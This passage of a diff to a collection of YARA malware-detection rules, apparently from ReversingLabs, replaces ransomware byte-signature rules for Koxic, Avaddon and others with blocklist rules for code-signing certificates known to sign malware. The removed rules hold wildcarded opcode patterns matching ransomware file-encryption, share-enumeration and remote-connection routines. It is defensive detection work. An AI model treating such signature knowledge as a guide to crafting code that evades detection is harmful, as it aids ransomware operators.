-            FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45
-            ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D
-            45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ??
-            ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81
-        }
-		$encrypt_files_p2 = {
-            EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55
-            ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ??
-            8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
-            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ??
-            02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ??
-            B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B
-            C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1
-            E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B
-            4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0
-            ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B
-            CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CFES Projects Ltd" and pe.signatures [ i ] . serial == "7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Koxic ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9"
-		date = "2022-04-21"
-		modified = "2022-04-21"
+		id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14968-L14984"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09"
+		logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Koxic"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$enum_shares_p1 = {
-            8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D
-            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B
-            55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1
-            E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B
-        }
-		$enum_shares_p2 = {
-            54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
-            0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ??
-            0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55
-            ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF
-            FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85
-            ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 EA ?? 89
-            55 ?? E9 ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 83 E2 ?? 74 ?? 8B
-            45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
-            ?? C1 E0 ?? 03 45 ?? B9 ?? ?? ?? ?? 6B D1 ?? 89 44 15 ?? B8 ?? ?? ?? ?? C1 E0 ?? 8B
-            4D ?? 89 4C 05 ?? BA ?? ?? ?? ?? D1 E2 8B 45 ?? 89 44 15 ?? 8D 4D ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? E9 ?? ?? ?? ?? EB ?? 81 7D ?? ?? ?? ?? ?? 74 ?? EB ?? 81 7D ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? B8 ?? ?? ?? ?? EB ?? 33 C0
-        }
-		$find_files = {
-            8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 33 D2 8B 45 ?? 66 89 10
-            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 83 F8 ?? 75 ?? E9 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 44 02 ?? 3D ?? ?? ?? ??
-            72 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
-            48 ?? 81 79 ?? ?? ?? ?? ?? 76 ?? 6A ?? FF 15 ?? ?? ?? ?? EB ?? 8B 95 ?? ?? ?? ?? 83
-            E2 ?? 74 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B 0D ?? ?? ?? ?? 51
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D
-            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E2 ?? 8B 45 ?? 89 44 15 ?? 8D 4D
-            ?? 51 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 75 ?? 6A ?? A1
-        }
-		$encrypt_files = {
-            8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ??
-            E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 4D ?? 2B C8 8B
-            45 ?? 1B C2 89 4D ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 50
-            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 72 ??
-            81 7D ?? ?? ?? ?? ?? 73 ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 FF
-            15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            EB ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89
-            45
-        }
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and pe.signatures [ i ] . serial == "73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Avaddon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Avaddon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f3a57482-5799-594b-bcfa-1137ca04dfd5"
-		date = "2020-10-19"
-		modified = "2020-10-19"
+		id = "5181b6e4-6a25-58f6-88c5-0eae98250648"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Avaddon.yara#L1-L148"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14986-L15002"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1b2c449d5bad02dd06cb4a980fcca1feaf02b1d8127096bb39deecbc544272a6"
+		logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Avaddon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F 5B C9 C3 56 8D 5F
-            ?? 03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ??
-            59 EB ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E EB ?? 33
-            C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 ?? 0F
-            B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B 8D ??
-            ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? ?? ??
-            ?? 83 C4 ?? E9 ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA
-            42 F7 D8 1B C0 33 FF 57 57 23 C2 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 53 FF
-            15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F8 E9 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39
-            8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD
-            ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ??
-            ?? 59 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B F8 56 FF 15 ?? ?? ??
-            ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 45 ?? 8B
-            7D ?? 85 C0 0F 84 ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 45 ?? 0F 57 C0 50 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 68 ?? ?? ??
-            ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 F6 39 75 ?? 0F 86 ?? ?? ?? ?? 83
-            7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 4D ?? 03 C6
-            50 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F
-            43 45 ?? 53 51 50 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 4D ?? 6A ?? 51 8D 45 ?? 0F 43 45 ?? 53 50 57 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 3B 75 ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 74
-        }
-		$encrypt_files_p3 = {
-            8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 51 52 57 89 55 ?? 89 4D ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 8B 9D ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? 72 ?? 8B 00 6A ??
-            8D 4D ?? 51 FF 73 ?? 50 57 FF D6 85 C0 74 ?? 8B 4B ?? 39 4D ?? 75 ?? 8B 45 ?? 89 85
-            ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 6A ?? 8D 85 ?? ??
-            ?? ?? 89 4D ?? 50 57 C7 45 ?? ?? ?? ?? ?? FF D6 85 C0 74 ?? 83 7D ?? ?? 75 ?? B3 ??
-            EB ?? 32 DB 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
-            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8A C3 EB ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 75 ?? 89 85 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 8D ?? ?? ?? ?? 89 4D ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 66 39 4E ?? 0F 86 ?? ??
-            ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 39 4E ?? 0F 84 ?? ?? ?? ?? 8B 06 8D 8D ?? ?? ?? ??
-            8B 7E ?? BA ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 78 ?? ?? 72 ?? 8B 00 6A
-            ?? 6A ?? 57 FF B5 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F8 89 BD ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
-            89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 8D 46 ?? 0F B7 4E ?? 72 ?? 8B
-        }
-		$remote_connection_p2 = {
-            00 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 51 50 57 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B D0 83 7A ?? ?? 72 ?? 8B 12 83 7E ?? ?? 8D 4E ?? 72 ?? 8B 09 83 7E ?? ?? 8D 46 ??
-            72 ?? 8B 00 6A ?? 57 6A ?? 6A ?? 52 51 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ??
-            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 46 ?? 85 C0
-            75 ?? 50 50 50 50 57 FF 15 ?? ?? ?? ?? EB ?? 83 C6 ?? 83 7E ?? ?? 72 ?? 8B 36 50 56
-            6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$enum_resources_p1 = {
-            33 D2 89 7D ?? 89 7D ?? 89 75 ?? 89 45 ?? 89 45 ?? 89 4D ?? 89 55 ?? 89 55 ?? 39 56
-            ?? 0F 84 ?? ?? ?? ?? 89 55 ?? 89 55 ?? 89 55 ?? 89 55 ?? 83 7E ?? ?? 8B C6 72 ?? 8B
-            06 8D 4D ?? 51 8D 4D ?? 51 8D 4D ?? 51 6A ?? 8D 4D ?? 51 6A ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8B 45 ?? 89 45 ??
-            C7 45 ?? ?? ?? ?? ?? 0F 82
-        }
-		$enum_resources_p2 = {
-            8D 4D ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 7D ?? 8D 4D ?? 8B 75 ?? 83 FF ?? 8B 55 ?? 6A
-            ?? 68 ?? ?? ?? ?? 0F 43 CE 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 7D ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 75 ?? 66 89 85 ?? ?? ?? ?? 83 CE ??
-            8B 47 ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            75 ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7F ??
-            ?? 8B C7 72 ?? 8B 07 FF 77 ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$enum_resources_p3 = {
-            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
-            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
-            64 A3 ?? ?? ?? ?? 8B 43 ?? 8D 4D ?? 89 45 ?? 89 45 ?? 66 8B 43 ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
-            8D 4D ?? 8D 45 ?? 0F 43 45 ?? 51 50 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? 8D 45 ??
-            8B 75 ?? 8D 4D ?? 8B 55 ?? 83 FF ?? 0F 43 45 ?? 0F 43 CA 8D 04 70 89 45 ?? 8D 45 ??
-            0F 43 45 ?? 8D 04 70 3B C8 74 ?? 66 83 39 ?? 74 ?? 83 C1 ?? 3B C8 75 ?? 3B C8 74 ??
-            8D 51 ?? 3B D0 74
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $enum_resources_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RAFO TECHNOLOGY INC" and pe.signatures [ i ] . serial == "21:1b:5d:fe:65:bc:6f:34:bc:9d:3a:54" and 1526717931 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5400D1C1406528B1Ef625976 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PXJ ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
